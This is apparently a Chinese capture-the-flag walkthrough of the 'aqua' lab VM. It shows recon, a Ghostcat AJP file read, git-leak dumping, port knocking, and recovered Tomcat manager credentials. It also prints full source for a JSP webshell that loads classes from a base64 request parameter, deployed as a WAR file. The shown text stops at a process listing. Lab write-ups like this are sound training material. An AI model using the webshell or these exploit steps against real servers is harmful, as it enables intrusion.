信息收集

ip定位

1
┌──(root㉿kali)-[/home/kali/Desktop/hmv/aqua]
2
└─# arp-scan -l | grep "08:00:27"
3
172.16.52.195   08:00:27:ac:48:09       PCS Systemtechnik GmbH

Nmap扫描

1
┌──(root㉿kali)-[/home/kali/Desktop/hmv/aqua]
2
└─# nmap -Pn -sTCV -T4 172.16.52.195
3
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-12-10 17:26 EST
4
Nmap scan report for 172.16.52.195
5
Host is up (0.00039s latency).
6
Not shown: 996 closed tcp ports (conn-refused)
7
PORT     STATE SERVICE VERSION
8
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
9
| ssh-hostkey:
10
|   2048 00:11:32:04:42:e0:7f:98:29:7c:1c:2a:b8:a7:b0:4a (RSA)
11
|   256 9c:92:93:eb:1c:8f:84:c8:73:af:ed:3b:65:09:e4:89 (ECDSA)
12
|_  256 a8:5b:df:d0:7e:31:18:6e:57:e7:dd:6b:d5:89:44:98 (ED25519)
13
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
14
|_http-server-header: Apache/2.4.29 (Ubuntu)
15
|_http-title: Todo sobre el Agua
16
8009/tcp open  ajp13   Apache Jserv (Protocol v1.3)
17
|_ajp-methods: Failed to get a valid response for the OPTION request
18
8080/tcp open  http    Apache Tomcat 8.5.5
19
|_http-open-proxy: Proxy might be redirecting requests
20
|_http-favicon: Apache Tomcat
21
|_http-title: Apache Tomcat/8.5.5
22
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
23

24
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
25
Nmap done: 1 IP address (1 host up) scanned in 23.24 seconds

8009端口

端口 8009	服务 AJP13	版本 Apache JServ Protocol	Tomcat AJP 反向代理远程文件包含漏洞 (Ghostcat CVE-2020-1938)

1
┌──(root㉿kali)-[/home/kali/Desktop/tools/Ghostcat]
2
└─# python ajpShooter.py http://172.16.52.195:8080/ 8009 /WEB-INF/web.xml read
3

4
/home/kali/Desktop/tools/Ghostcat/ajpShooter.py:363: SyntaxWarning: invalid escape sequence '\ '
5
  /_\  (_)_ __   / _\ |__   ___   ___ | |_ ___ _ __
6

7
       _    _         __ _                 _
8
      /_\  (_)_ __   / _\ |__   ___   ___ | |_ ___ _ __
9
     //_\\ | | '_ \  \ \| '_ \ / _ \ / _ \| __/ _ \ '__|
10
    /  _  \| | |_) | _\ \ | | | (_) | (_) | ||  __/ |
11
    \_/ \_// | .__/  \__/_| |_|\___/ \___/ \__\___|_|
12
         |__/|_|
13
                                                00theway,just for test
14

15

16
[<] 200 200
17
[<] Accept-Ranges: bytes
18
[<] ETag: W/"1227-1472673232000"
19
[<] Last-Modified: Wed, 31 Aug 2016 19:53:52 GMT
20
[<] Content-Type: application/xml
21
[<] Content-Length: 1227
22

23
<?xml version="1.0" encoding="UTF-8"?>
24
<!--
25
 Licensed to the Apache Software Foundation (ASF) under one or more
26
  contributor license agreements.  See the NOTICE file distributed with
27
  this work for additional information regarding copyright ownership.
28
  The ASF licenses this file to You under the Apache License, Version 2.0
29
  (the "License"); you may not use this file except in compliance with
30
  the License.  You may obtain a copy of the License at
31

32
      http://www.apache.org/licenses/LICENSE-2.0
33

34
  Unless required by applicable law or agreed to in writing, software
35
  distributed under the License is distributed on an "AS IS" BASIS,
36
  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
37
  See the License for the specific language governing permissions and
38
  limitations under the License.
39
-->
40
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"
41
  xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
42
  xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee
43
                      http://xmlns.jcp.org/xml/ns/javaee/web-app_3_1.xsd"
44
  version="3.1"
45
  metadata-complete="true">
46

47
  <display-name>Welcome to Tomcat</display-name>
48
  <description>
49
     Welcome to Tomcat
50
  </description>
51

52
</web-app>

使用ajpShooter成功获得敏感信息

读了半天只读出个这玩意

80端口

目录枚举

1
┌──(root㉿kali)-[/home/kali/Desktop/hmv/aqua]
2
└─# dirsearch -u http://172.16.52.195
3
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
4
  from pkg_resources import DistributionNotFound, VersionConflict
5

6
  _|. _ _  _  _  _ _|_    v0.4.3
7
 (_||| _) (/_(_|| (_| )
8

9
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
10

11
Output File: /home/kali/Desktop/hmv/aqua/reports/http_172.16.52.195/_25-12-10_17-45-04.txt
12

13
Target: http://172.16.52.195/
14

15
[17:45:13] 301 -  312B  - /css  ->  http://172.16.52.195/css/
16
[17:45:16] 301 -  312B  - /img  ->  http://172.16.52.195/img/
17
[17:45:23] 200 -   33B  - /robots.txt
18
[17:45:24] 403 -  278B  - /server-status
19
[17:45:24] 403 -  278B  - /server-status/

robots.txt

1
User-Agent: *
2
Disalow: /SuperCMS

/SuperCMS

访问

仅仅得到一张图片，直接目录扫描

目录扫描

1
──(root㉿kali)-[/home/kali/Desktop/hmv/aqua]
2
└─# dirsearch -u http://172.16.52.195/SuperCMS/
3
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
4
  from pkg_resources import DistributionNotFound, VersionConflict
5

6
  _|. _ _  _  _  _ _|_    v0.4.3
7
 (_||| _) (/_(_|| (_| )
8

9
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25
10
Wordlist size: 11460
11

12
Output File: /home/kali/Desktop/hmv/aqua/reports/http_172.16.52.195/_SuperCMS__25-12-10_17-49-14.txt
13

14
Target: http://172.16.52.195/
15

16
[17:49:14] Starting: SuperCMS/
17
[17:49:14] 301 -  320B  - /SuperCMS/js  ->  http://172.16.52.195/SuperCMS/js/
18
[17:49:15] 301 -  322B  - /SuperCMS/.git  ->  http://172.16.52.195/SuperCMS/.git/
19
[17:49:15] 200 -  420B  - /SuperCMS/.git/branches/
20
[17:49:15] 200 -  607B  - /SuperCMS/.git/
21
[17:49:15] 200 -  257B  - /SuperCMS/.git/config
22
[17:49:15] 200 -   73B  - /SuperCMS/.git/description
23
[17:49:15] 200 -  644B  - /SuperCMS/.git/hooks/
24
[17:49:15] 200 -   21B  - /SuperCMS/.git/HEAD
25
[17:49:15] 200 -  620B  - /SuperCMS/.git/index
26
[17:49:15] 200 -  466B  - /SuperCMS/.git/info/
27
[17:49:15] 200 -  240B  - /SuperCMS/.git/info/exclude
28
[17:49:15] 200 -  488B  - /SuperCMS/.git/logs/
29
[17:49:15] 301 -  332B  - /SuperCMS/.git/logs/refs  ->  http://172.16.52.195/SuperCMS/.git/logs/refs/
30
[17:49:15] 301 -  347B  - /SuperCMS/.git/logs/refs/remotes/origin  ->  http://172.16.52.195/SuperCMS/.git/logs/refs/remotes/origin/
31
[17:49:15] 301 -  338B  - /SuperCMS/.git/logs/refs/heads  ->  http://172.16.52.195/SuperCMS/.git/logs/refs/heads/
32
[17:49:15] 301 -  340B  - /SuperCMS/.git/logs/refs/remotes  ->  http://172.16.52.195/SuperCMS/.git/logs/refs/remotes/
33
[17:49:15] 200 -  176B  - /SuperCMS/.git/logs/refs/remotes/origin/HEAD
34
[17:49:15] 200 -  176B  - /SuperCMS/.git/logs/HEAD
35
[17:49:15] 200 -  480B  - /SuperCMS/.git/refs/
36
[17:49:15] 301 -  333B  - /SuperCMS/.git/refs/heads  ->  http://172.16.52.195/SuperCMS/.git/refs/heads/
37
[17:49:15] 200 -  659B  - /SuperCMS/.git/objects/
38
[17:49:15] 200 -  112B  - /SuperCMS/.git/packed-refs
39
[17:49:15] 301 -  335B  - /SuperCMS/.git/refs/remotes  ->  http://172.16.52.195/SuperCMS/.git/refs/remotes/
40
[17:49:15] 301 -  342B  - /SuperCMS/.git/refs/remotes/origin  ->  http://172.16.52.195/SuperCMS/.git/refs/remotes/origin/
41
[17:49:15] 200 -   30B  - /SuperCMS/.git/refs/remotes/origin/HEAD
42
[17:49:15] 301 -  332B  - /SuperCMS/.git/refs/tags  ->  http://172.16.52.195/SuperCMS/.git/refs/tags/
43
[17:49:26] 301 -  321B  - /SuperCMS/css  ->  http://172.16.52.195/SuperCMS/css/
44
[17:49:30] 301 -  321B  - /SuperCMS/img  ->  http://172.16.52.195/SuperCMS/img/
45
[17:49:31] 200 -  464B  - /SuperCMS/js/
46
[17:49:32] 200 -  779B  - /SuperCMS/login.html
47
[17:49:38] 200 -   37B  - /SuperCMS/README.md

login.html

没啥思路

Git泄露

1
┌──(root㉿kali)-[/home/…/Desktop/hmv/aqua/172.16.52.195]
2
└─#  githacker --url http://172.16.52.195/SuperCMS/.git/ --output-folder result
3

4
┌──(root㉿kali)-[/home/…/aqua/172.16.52.195/result/60874c11d6e26a35aec2178ca897434a]
5
└─# git log
6
commit 2e6cd2656d4e343dbcbc0e59297b9b217656c3a4 (HEAD -> main, origin/main, origin/HEAD)
7
Author: aquilino <hidro23@hotmail.com>
8
Date:   Fri Oct 1 09:59:53 2021 +0200
9

10
    Add files via upload
11

12
commit c3e76fb1f1bd32996e2549c699b0a4fa528e9a0d
13
Author: aquilino <hidro23@hotmail.com>
14
Date:   Fri Oct 1 09:50:16 2021 +0200
15

16
    Delete login.html
17

18
commit ac5bbd68afc5dc0d528f8e72daf14ab547c4b55a
19
Author: aquilino <hidro23@hotmail.com>
20
Date:   Thu Sep 30 13:43:50 2021 +0200
21

22
    Update index.html
23

24
commit f159677b7a6fb9090d9f8ba957e7e8a46f5b6df3
25
Author: aquilino <hidro23@hotmail.com>
26
Date:   Thu Sep 30 13:42:21 2021 +0200
27

28
    Update README.md
29

30
commit 8cb735a8c51987448f9386406933d0a147a1cb3f
31
Author: aquilino <hidro23@hotmail.com>
32
Date:   Fri Jun 18 16:47:50 2021 +0200
33

34
    Add files via upload
35

36
commit 3b7e4b8bb0eeb8557fc3ab0b9e7acec16431150a
37
Author: aquilino <hidro23@hotmail.com>
38
Date:   Thu Jun 17 13:08:43 2021 +0200
39

40
    Delete knocking_on_Atlantis_door.txt
41

42
    Arthur, has perdido tu oportunidad
43

44
commit 58afe63a1cd28fa167b95bcff50d2f6f011337c1
45
Author: aquilino <hidro23@hotmail.com>
46
Date:   Thu Jun 17 12:59:05 2021 +0200
47

48
    Create knocking_on_Atlantis_door.txt
49

50
    Las Puertas del avismo
51

52
commit 7b1614729157e934673b9b90ac71a2007cbf2190
53
Author: aquilino <hidro23@hotmail.com>
54
Date:   Thu Jun 17 12:57:40 2021 +0200
55

56
    Initial commit
57
(END)

knocking_on_Atlantis_door.txt

1
┌──(root㉿kali)-[/home/…/aqua/172.16.52.195/result/60874c11d6e26a35aec2178ca897434a]
2
└─# git show 58afe63a1cd28fa167b95bcff50d2f6f011337c1
3
commit 58afe63a1cd28fa167b95bcff50d2f6f011337c1
4
Author: aquilino <hidro23@hotmail.com>
5
Date:   Thu Jun 17 12:59:05 2021 +0200
6

7
    Create knocking_on_Atlantis_door.txt
8

9
    Las Puertas del avismo
10

11
diff --git a/knocking_on_Atlantis_door.txt b/knocking_on_Atlantis_door.txt
12
new file mode 100644
13
index 0000000..84cdd81
14
--- /dev/null
15
+++ b/knocking_on_Atlantis_door.txt
16
@@ -0,0 +1,2 @@
17
+Para abrir  las puertas esta es la secuencia
18
+(☞ﾟヮﾟ)☞ 1100,800,666 ☜(ﾟヮﾟ☜)
19

20
要打开大门，这是顺序：1100，800，666

也就是说：
目标主机隐藏了某个服务（比如 SSH、后台、数据库），需要按顺序访问三个端口：1100 → 800 → 666 才会开放真正的端口。

这 100% 是 Port Knocking 机制。

Knock

1
knock 172.16.52.195 1100 800 666 -v

二次信息收集

Nmap扫描

1
┌──(root㉿kali)-[/home/kali/Desktop/hmv/aqua]
2
└─# nmap -Pn -sTCV -T4 172.16.52.195
3
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-12-10 18:45 EST
4
Nmap scan report for 172.16.52.195
5
Host is up (0.0018s latency).
6
Not shown: 995 filtered tcp ports (no-response)
7
PORT     STATE SERVICE VERSION
8
21/tcp   open  ftp     vsftpd 3.0.3
9
| ftp-syst:
10
|   STAT:
11
| FTP server status:
12
|      Connected to 172.16.55.179
13
|      Logged in as ftp
14
|      TYPE: ASCII
15
|      Session bandwidth limit in byte/s is 1048576
16
|      Session timeout in seconds is 300
17
|      Control connection is plain text
18
|      Data connections will be plain text
19
|      At session startup, client count was 3
20
|      vsFTPd 3.0.3 - secure, fast, stable
21
|_End of status
22
|_ftp-bounce: bounce working!
23
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
24
|_drwxr-xr-x    2 0        0            4096 Jun 30  2021 pub
25
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
26
| ssh-hostkey:
27
|   2048 00:11:32:04:42:e0:7f:98:29:7c:1c:2a:b8:a7:b0:4a (RSA)
28
|   256 9c:92:93:eb:1c:8f:84:c8:73:af:ed:3b:65:09:e4:89 (ECDSA)
29
|_  256 a8:5b:df:d0:7e:31:18:6e:57:e7:dd:6b:d5:89:44:98 (ED25519)
30
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
31
|_http-server-header: Apache/2.4.29 (Ubuntu)
32
|_http-title: Todo sobre el Agua
33
8009/tcp open  ajp13   Apache Jserv (Protocol v1.3)
34
|_ajp-methods: Failed to get a valid response for the OPTION request
35
8080/tcp open  http    Apache Tomcat 8.5.5
36
|_http-favicon: Apache Tomcat
37
|_http-open-proxy: Proxy might be redirecting requests
38
|_http-title: Apache Tomcat/8.5.5
39
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
40

41
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
42
Nmap done: 1 IP address (1 host up) scanned in 31.82 seconds

可以看见多开放了一个21端口

FTP匿名登录

1
┌──(root㉿kali)-[/home/kali/Desktop/hmv/aqua]
2
└─# ftp 172.16.52.195
3
Connected to 172.16.52.195.
4
220 (vsFTPd 3.0.3)
5
Name (172.16.52.195:kali): anonymous
6
331 Please specify the password.
7
Password:
8
230 Login successful.
9
Remote system type is UNIX.
10
Using binary mode to transfer files.
11

12
ftp> pwd
13
Remote directory: /
14
ftp> cd pub
15
250 Directory successfully changed.
16
ftp> ls -al
17
229 Entering Extended Passive Mode (|||30960|)
18
150 Here comes the directory listing.
19
drwxr-xr-x    2 0        0            4096 Jun 30  2021 .
20
drwxr-xr-x    3 0        0            4096 Feb 03  2021 ..
21
-rw-r--r--    1 0        0            1250 Feb 03  2021 .backup.zip

压缩包解压

1
┌──(root㉿kali)-[/home/kali/Desktop/hmv/aqua]
2
└─# 7z x backup.zip
3

4

5
7-Zip 24.08 (x64) : Copyright (c) 1999-2024 Igor Pavlov : 2024-08-11
6
 64-bit locale=zh_CN.UTF-8 Threads:128 OPEN_MAX:1024
7

8
Scanning the drive for archives:
9
1 file, 1250 bytes (2 KiB)
10

11
Extracting archive: backup.zip
12
--
13
Path = backup.zip
14
Type = zip
15
Physical Size = 1250
16

17

18
Enter password (will not be echoed):

需要输入密码

压缩包密码解密

view-source:http://172.16.52.195/↗

1
<!DOCTYPE html>
2

3
<html>
4
  <head>
5
      <meta charset="utf-8">
6
      <title>Todo sobre el Agua</title>
7
      <link href="https://fonts.googleapis.com/css?family=Lobster" rel="stylesheet">
8
      <link rel="stylesheet" href="css/main.css" />
9
  </head>
10
  <body>
11
  <header class="header content">
12
    <div class="header-video">
13
      <video src="img/video.mp4" autoplay loop muted></video/>
14
    </div>
15

16
    <div class="header-overlay"></div>
17

18
    <div class="header-content">
19
      <h1> El agua (del latín aqua)</h1>
20
      <p> El (agua)1 es una sustancia cuya molécula está compuesta por dos átomos de hidrógeno y uno de oxígeno (H2O)2. El término agua, generalmente, se refiere a la sustancia en su estado líquido, aunque esta puede hallarse en su forma sólida, llamada hielo, y en su forma gaseosa, denominada vapor.Es una sustancia bastante común en la Tierra y el sistema solar, donde se encuentra principalmente en forma de vapor o de hielo. Es indispensable para el origen y supervivencia de la gran mayoría de formas de vida conocidas.
21
      </p>
22

23
      <p>El agua recubre el 71 % de la superficie de la corteza terrestre.Se localiza principalmente en los océanos, donde se concentra el 96,5 % del agua total. A los glaciares y casquetes polares les corresponde el 1,74 %, mientras que los depósitos subterráneos (acuíferos), los permafrost y los glaciares continentales concentran el 1,72 %. El restante 0,04 % se reparte en orden decreciente entre lagos, humedad del suelo, atmósfera, embalses, ríos y seres vivos.El agua circula constantemente en un ciclo de evaporación o transpiración (evapotranspiración), precipitación y desplazamiento hacia el mar. Los vientos la transportan en las nubes, como vapor de agua, desde el mar, y en sentido inverso tanta agua como la que se vierte desde los ríos en los mares, en una cantidad aproximada de 45 000 km³ al año. En tierra firme, la evaporación y transpiración contribuyen con 74 000 km³ anuales, por lo que las precipitaciones totales son de 119 000 km³ cada año.
24
      </p>
25

26
      <p> Se estima que aproximadamente el 70 % del agua dulce se destina a la agricultura.El agua en la industria absorbe una media del 20 % del consumo mundial, empleándose en tareas de refrigeración, transporte y como disolvente en una gran variedad de procesos industriales. El consumo doméstico absorbe el 10 % restante. El acceso al agua potable se ha incrementado durante las últimas décadas en prácticamente todos los países.89 Sin embargo, estudios de la FAO estiman que uno de cada cinco países en vías de desarrollo tendrá problemas de escasez de agua antes de 2030; en esos países es vital un menor gasto de agua en la agricultura, modernizando los sistemas de riego.
27
      </p>
28
      <a href="#" class="btn">about</a>
29
      <a href="#" class="btn">contact</a>
30
    </div>
31
  </header>
32
 </body>
33
</html>

(agua)1 (H2O)2

真阴间啊

view-source:http://172.16.52.195/SuperCMS/↗

源码最底下有

base64解密

1=2 = password_zip

进行解压

密码为

agua=H2O

tomcat-users

1
<?xml version="1.0" encoding="UTF-8"?>
2
<!--
3
  Licensed to the Apache Software Foundation (ASF) under one or more
4
  contributor license agreements.  See the NOTICE file distributed with
5
  this work for additional information regarding copyright ownership.
6
  The ASF licenses this file to You under the Apache License, Version 2.0
7
  (the "License"); you may not use this file except in compliance with
8
  the License.  You may obtain a copy of the License at
9

10
      http://www.apache.org/licenses/LICENSE-2.0
11

12
  Unless required by applicable law or agreed to in writing, software
13
  distributed under the License is distributed on an "AS IS" BASIS,
14
  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
15
  See the License for the specific language governing permissions and
16
  limitations under the License.
17
-->
18
<tomcat-users xmlns="http://tomcat.apache.org/xml"
19
              xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
20
              xsi:schemaLocation="http://tomcat.apache.org/xml tomcat-users.xsd"
21
              version="1.0">
22
<!--
23
  NOTE:  By default, no user is included in the "manager-gui" role required
24
  to operate the "/manager/html" web application.  If you wish to use this app,
25
  you must define such a user - the username and password are arbitrary. It is
26
  strongly recommended that you do NOT use one of the users in the commented out
27
  section below since they are intended for use with the examples web
28
  application.
29
-->
30
<!--
31
  NOTE:  The sample user and role entries below are intended for use with the
32
  examples web application. They are wrapped in a comment and thus are ignored
33
  when reading this file. If you wish to configure these users for use with the
34
  examples web application, do not forget to remove the <!.. ..> that surrounds
35
  them. You will also need to set the passwords to something appropriate.
36
-->
37
<!--
38
  <role rolename="tomcat"/>
39
  <role rolename="role1"/>
40
  <user username="tomcat" password="<must-be-changed>" roles="tomcat"/>
41
  <user username="both" password="<must-be-changed>" roles="tomcat,role1"/>
42
  <user username="role1" password="<must-be-changed>" roles="role1"/>
43
-->
44
        <role rolename="manager-gui"/>
45
        <role rolename="admin-gui"/>
46
        <user username="aquaMan" password="P4st3lM4n" roles="manager-gui,admin-gui"/>
47
</tomcat-users>

8080端口

Apache Tomcat 8.5.5

username=“aquaMan” password=“P4st3lM4n”

在 Manager 的 Deploy → WAR file to upload 这里上传你自己的 WAR 包即可

1
<%!
2

3
    class U extends ClassLoader {
4

5
        U(ClassLoader c) {
6

7
            super(c);
8

9
        }
10

11
        public Class g(byte[] b) {
12

13
            return super.defineClass(b, 0, b.length);
14

15
        }
16

17
    }
18

19

20

21
    public byte[] base64Decode(String str) throws Exception {
22

23
        try {
24

25
            Class clazz = Class.forName("sun.misc.BASE64Decoder");
26

27
            return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
28

29
        } catch (Exception e) {
30

31
            Class clazz = Class.forName("java.util.Base64");
32

33
            Object decoder = clazz.getMethod("getDecoder").invoke(null);
34

35
            return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
36

37
        }
38

39
    }
40

41
%>
42

43
<%
44

45
    String cls = request.getParameter("hack");
46

47
    if (cls != null) {
48

49
        new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);
50

51
    }
52

53
%>

1
mkdir exp && cp exp.jsp exp/ && jar -cvf exp.war -C exp .
2
生成的文件：
3
exp.war

tomcat提权

ps进程

1
tomcat:/) $ ps aux
2
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
3
root         1  0.1  0.8 159712  8992 ?        Ss   06:34   0:14 /sbin/init maybe-ubiquity
4
root         2  0.0  0.0      0     0 ?        S    06:34   0:00 [kthreadd]
5
root         4  0.0  0.0      0     0 ?        I<   06:34   0:00 [kworker/0:0H]
6
root         6  0.0  0.0      0     0 ?        I<   06:34   0:00 [mm_percpu_wq]
7
root         7  0.0  0.0      0     0 ?        S    06:34   0:03 [ksoftirqd/0]
8
root         8  0.0  0.0      0     0 ?        I    06:34   0:01 [rcu_sched]
9
root         9  0.0  0.0      0     0 ?        I    06:34   0:00 [rcu_bh]
10
root        10  0.0  0.0      0     0 ?        S    06:34   0:00 [migration/0]
11
root        11  0.0  0.0      0     0 ?        S    06:34   0:00 [watchdog/0]
12
root        12  0.0  0.0      0     0 ?        S    06:34   0:00 [cpuhp/0]
13
root        13  0.0  0.0      0     0 ?        S    06:34   0:00 [kdevtmpfs]
14
root        14  0.0  0.0      0     0 ?        I<   06:34   0:00 [netns]
15
root        15  0.0  0.0      0     0 ?        S    06:34   0:00 [rcu_tasks_kthre]
16
root        16  0.0  0.0      0     0 ?        S    06:34   0:00 [kauditd]
17
root        17  0.0  0.0      0     0 ?        S    06:34   0:00 [khungtaskd]
18
root        18  0.0  0.0      0     0 ?        S    06:34   0:00 [oom_reaper]
19
root        19  0.0  0.0      0     0 ?        I<   06:34   0:00 [writeback]
20
root        20  0.0  0.0      0     0 ?        S    06:34   0:00 [kcompactd0]
21
root        21  0.0  0.0      0     0 ?        SN   06:34   0:00 [ksmd]
22
root        22  0.0  0.0      0     0 ?        SN   06:34   0:00 [khugepaged]
23
root        23  0.0  0.0      0     0 ?        I<   06:34   0:00 [crypto]
24
root        24  0.0  0.0      0     0 ?        I<   06:34   0:00 [kintegrityd]
25
root        25  0.0  0.0      0     0 ?        I<   06:34   0:00 [kblockd]
26
root        26  0.0  0.0      0     0 ?        I<   06:34   0:00 [ata_sff]
27
root        27  0.0  0.0      0     0 ?        I<   06:34   0:00 [md]
28
root        28  0.0  0.0      0     0 ?        I<   06:34   0:00 [edac-poller]
29
root        29  0.0  0.0      0     0 ?        I<   06:34   0:00 [devfreq_wq]
30
root        30  0.0  0.0      0     0 ?        I<   06:34   0:00 [watchdogd]
31
root        34  0.0  0.0      0     0 ?        S    06:34   0:00 [kswapd0]
32
root        35  0.0  0.0      0     0 ?        I<   06:34   0:00 [kworker/u3:0]
33
root        36  0.0  0.0      0     0 ?        S    06:34   0:00 [ecryptfs-kthrea]
34
root        78  0.0  0.0      0     0 ?        I<   06:34   0:00 [kthrotld]
35
root        79  0.0  0.0      0     0 ?        I<   06:34   0:00 [acpi_thermal_pm]
36
root        80  0.0  0.0      0     0 ?        S    06:34   0:00 [scsi_eh_0]
37
root        81  0.0  0.0      0     0 ?        I<   06:34   0:00 [scsi_tmf_0]
38
root        82  0.0  0.0      0     0 ?        S    06:34   0:00 [scsi_eh_1]
39
root        83  0.0  0.0      0     0 ?        I<   06:34   0:00 [scsi_tmf_1]
40
root        85  0.0  0.0      0     0 ?        I    06:34   0:01 [kworker/u2:3]
41
root        89  0.0  0.0      0     0 ?        I<   06:34   0:00 [ipv6_addrconf]
42
root        98  0.0  0.0      0     0 ?        I<   06:34   0:00 [kstrp]
43
root       115  0.0  0.0      0     0 ?        I<   06:34   0:00 [charger_manager]
44
root       175  0.0  0.0      0     0 ?        I<   06:34   0:00 [ttm_swap]
45
root       180  0.0  0.0      0     0 ?        S    06:34   0:00 [irq/18-vmwgfx]
46
root       213  0.0  0.0      0     0 ?        I<   06:34   0:00 [kworker/0:1H]
47
root       214  0.0  0.0      0     0 ?        S    06:34   0:00 [scsi_eh_2]
48
root       215  0.0  0.0      0     0 ?        I<   06:34   0:00 [scsi_tmf_2]
49
root       221  0.0  0.0      0     0 ?        I<   06:34   0:00 [kdmflush]
50
root       222  0.0  0.0      0     0 ?        I<   06:34   0:00 [bioset]
51
root       291  0.0  0.0      0     0 ?        I<   06:34   0:00 [raid5wq]
52
root       345  0.0  0.0      0     0 ?        S    06:34   0:00 [jbd2/dm-0-8]
53
root       346  0.0  0.0      0     0 ?        I<   06:34   0:00 [ext4-rsv-conver]
54
root       408  0.0  5.8 160228 58988 ?        S<s  06:34   0:04 /lib/systemd/systemd-journald
55
root       421  0.0  0.0      0     0 ?        I<   06:34   0:00 [iscsi_eh]
56
root       422  0.0  0.0      0     0 ?        I<   06:34   0:00 [ib-comp-wq]
57
root       423  0.0  0.0      0     0 ?        I<   06:34   0:00 [ib-comp-unb-wq]
58
root       424  0.0  0.0      0     0 ?        I<   06:34   0:00 [ib_mcast]
59
root       425  0.0  0.0      0     0 ?        I<   06:34   0:00 [ib_nl_sa_wq]
60
root       426  0.0  0.0      0     0 ?        I<   06:34   0:00 [rdma_cm]
61
root       430  0.0  0.1 105912  1868 ?        Ss   06:34   0:00 /sbin/lvmetad -f
62
root       437  0.3  0.5  47220  6052 ?        Ss   06:34   0:28 /lib/systemd/systemd-udevd
63
systemd+   471  0.0  0.3 141960  3328 ?        Ssl  06:34   0:00 /lib/systemd/systemd-timesyncd
64
root       478  0.0  0.0      0     0 ?        I<   06:34   0:00 [iprt-VBoxWQueue]
65
systemd+   668  0.0  0.5  80088  5448 ?        Ss   06:34   0:00 /lib/systemd/systemd-networkd
66
systemd+   690  0.0  0.5  70668  5292 ?        Ss   06:34   0:00 /lib/systemd/systemd-resolved
67
root       763  0.0  0.5  62168  5828 ?        Ss   06:34   0:00 /lib/systemd/systemd-logind
68
message+   765  0.0  0.4  50052  4672 ?        Ss   06:34   0:02 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
69
memcache   810  0.0  0.4 425800  4128 ?        Ssl  06:34   0:04 /usr/bin/memcached -m 64 -p 11211 -u memcache -l 127.0.0.1
70
root       812  0.0  1.7 169192 17180 ?        Ssl  06:34   0:00 /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers
71
syslog     813  0.0  0.4 267276  4904 ?        Ssl  06:34   0:00 /usr/sbin/rsyslogd -n
72
daemon     815  0.0  0.2  28340  2464 ?        Ss   06:34   0:00 /usr/sbin/atd -f
73
root       817  0.0  0.3  30112  3160 ?        Ss   06:34   0:00 /usr/sbin/cron -f
74
root       818  0.0  0.6 286456  6900 ?        Ssl  06:34   0:00 /usr/lib/accountsservice/accounts-daemon
75
root       819  0.0  0.8  32968  8284 ?        Ss   06:34   0:00 /usr/bin/python /root/server.py
76
root       820  0.0  0.1  95548  1680 ?        Ssl  06:34   0:00 /usr/bin/lxcfs /var/lib/lxcfs/
77
root       833  0.0  0.4   8924  4192 ?        Ss   06:34   0:00 /usr/sbin/knockd -i enp0s3
78
root       950  0.0  0.2  29156  2896 ?        Ss   06:34   0:00 /usr/sbin/vsftpd /etc/vsftpd.conf
79
root       951  0.0  1.9 186044 20064 ?        Ssl  06:34   0:00 /usr/bin/python3 /usr/share/unattended-upgrades/unattended-upgrade-shutdown --wait-for-signal
80
root       973  0.0  0.6  72308  6548 ?        Ss   06:34   0:00 /usr/sbin/sshd -D
81
root      1025  0.0  0.1  13252  1964 tty1     Ss+  06:34   0:00 /sbin/agetty -o -p -- \u --noclear tty1 linux
82
root      1026  0.0  0.6 288888  6572 ?        Ssl  06:34   0:00 /usr/lib/policykit-1/polkitd --no-debug
83
tomcat    1143  0.1 23.8 3228624 240712 ?      Sl   06:34   0:13 /usr/lib/jvm/java-1.11.0-openjdk-amd64/bin/java -Djava.util.logging.config.file=/opt/tomcat/conf/logging.properties -Djava.util.logging.manager=org.apache.juli.ClassLoaderLogManager -Djava.awt.headless=true -Djava.security.egd=file:/dev/./urandom -Djdk.tls.ephemeralDHKeySize=2048 -Xms512M -Xmx1024M -server -XX:+UseParallelGC -classpath /opt/tomcat/bin/bootstrap.jar:/opt/tomcat/bin/tomcat-juli.jar -Dcatalina.base=/opt/tomcat -Dcatalina.home=/opt/tomcat -Djava.io.tmpdir=/opt/tomcat/temp org.apache.catalina.startup.Bootstrap start
84
root      1466  0.0  1.7 340008 17544 ?        Ss   06:34   0:00 /usr/sbin/apache2 -k start
85
www-data  1752  0.0  1.0 344720 10676 ?        S    06:34   0:00 /usr/sbin/apache2 -k start
86
www-data  1756  0.0  1.0 344656 10612 ?        S    06:34   0:00 /usr/sbin/apache2 -k start
87
root      3323  0.0  0.0      0     0 ?        I    08:46   0:00 [kworker/u2:1]
88
root     11175  0.0  0.0      0     0 ?        I    08:54   0:00 [kworker/0:2]
89
